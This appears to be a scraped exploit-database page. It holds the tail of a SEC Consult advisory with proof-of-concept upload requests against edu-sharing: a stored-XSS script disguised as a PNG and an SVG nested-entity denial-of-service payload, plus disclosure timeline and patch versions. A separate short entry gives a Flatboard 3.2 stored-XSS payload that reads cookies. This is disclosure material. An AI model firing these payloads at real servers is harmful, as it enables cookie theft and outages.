INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID<br />Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885<br />Content-Length: 288<br /><br />-----------------------------159605426213527963452762824885<br />Content-Disposition: form-data; name="file";<br /><br />‰PNG<br /><br /><!DOCTYPE html><br /><html><br /><body><br /><h1>Test</h1><br /><script>alert(window.location)</script><br /></body><br /></html><br />-----------------------------159605426213527963452762824885--<br />--------------------------------------------------------------------------------<br /><br />Visiting the preview URL as seen in figure 1 below shows that the JavaScript<br />code is executed:<br />[01_stored_xss.png]<br /><br /><br />b. Denial of Service (SVG Upload)<br />The initial request can be modified to upload an SVG file containing<br />nested XML entities. The "mimetype" parameter is changed to "image%2Fsvg":<br /><br />--------------------------------------------------------------------------------<br />POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1<br />Host: $SERVER<br />Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID<br />Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803<br />Content-Length: 581<br /><br />-----------------------------29539943986372261721095197803<br />Content-Disposition: form-data; name="file";<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1 <br />"&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]><br /><svg xmlns="http://www.w3.org/2000/svg"><br /> <data>&t2;</data><br /></svg><br /><br />-----------------------------29539943986372261721095197803--<br />--------------------------------------------------------------------------------<br /><br />Visiting the preview URL as seen in figure 2 below shows that the XML code is<br />parsed:<br />[02_denial_of_service]<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 9.0 (pre-release)<br /><br />The vendor confirmed that previous versions (8.0 and 8.1) are affected as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-04-10: Contacting vendor through security@edu-sharing.com<br />2024-04-11: Vendor replied and confirmed security contact.<br /> Advisory information has been sent to vendor.<br />2024-04-12: Vendor confirmed receiving the advisory and is now trying to<br /> reproduce the described behavior.<br />2024-05-03: Reminder sent to security@edu-sharing.com, asking for an update on<br /> fixing the vulnerability.<br />2024-05-07: Vendor provides affected versions. Fixes have already been implemented<br /> and published. Vendor is requesting to wait with the public advisory<br /> release in order to allow affected customers to perform the next rollout.<br />2024-05-07: Vendor provides fixed versions.<br /> Public advisory release scheduled for 2024-06-04.<br />2024-05-15: Public advisory release postponed to 2024-06-20.<br />2024-06-20: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The repository base version in use can be identified in the Admin-Tools.<br />The vendor provides a patch for the affected versions:<br />* Version 8.0: Update repository version to "8.0.8-RC2" or later<br />* Version 8.1: Update repository version to "8.1.4-RC0" or later<br />* Version 9.0: Update repository version to "9.0.0-RC19" or later<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Kai Zimmermann / 2024<br /></code></pre>
<pre><code># Exploit Title: Flatboard v3.2 - Stored XSS<br /># Date: 2024-06-23<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://flatboard.org/<br /># Version: 3.2<br /><br /><br />----------------------------------------------------------------------------------------------------<br /><br />1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum<br />2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)><br />3-Save it , you will be see alert button<br /><br /><br /></code></pre>